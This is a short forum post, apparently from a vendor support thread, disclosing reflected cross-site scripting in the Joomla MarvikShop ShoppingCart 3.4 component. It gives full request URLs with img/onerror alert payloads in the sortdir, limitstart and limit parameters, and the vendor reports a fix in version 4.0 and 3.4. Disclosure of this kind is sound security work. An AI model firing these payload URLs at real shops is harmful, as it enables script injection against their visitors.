Joomla MarvikShop ShoppingCart 3.4 Cross Site Scripting

More
8 months 2 weeks ago #2173 by Support Team
Code:
Path: /en/index.php GET parameter 'sortdir' is vulnerable to XSS index.php?option=com_oscommerce&osMod=mshop_pl_src&manufacturers_id=7&sort=products_sort_order&page=index.php&format=xml&task=showproducts&view=med&sort=latest&sortdir=descgt5po<img src=a on-error=alert(1)>vh217 GET parameter 'limitstart' is vulnerable to XSS index.php?option=com_oscommerce&osMod=mshop_pl_src&manufacturers_id=7&sort=products_sort_order&page=index.php&format=xml&task=showproducts&view=med&sort=latest&sortdir=desc&limitstart=0lmefx<img src=a on-error=alert(1)>fe7s7 GET parameter 'limit' is vulnerable to XSS index.php?option=com_oscommerce&osMod=mshop_pl_src&manufacturers_id=7&sort=products_sort_order&page=index.php&format=xml&task=showproducts&view=med&sort=latest&sortdir=desc&limitstart=0&limit=25oj1c5<img src=a on-error=alert(1)>tquly

This issue has been resolved in Version 4.0 and retroactively in 3.4. Have you found anything else? Please let us know.

Please Log in or Create an account to join the conversation.

Events Joomla
MarvikShop
Finnaly it's here:
 
No bridges, no look a likes!
This is the ultimate integration
between Oscommerce and Joomla!
Documentation
Site Showcase
Follow us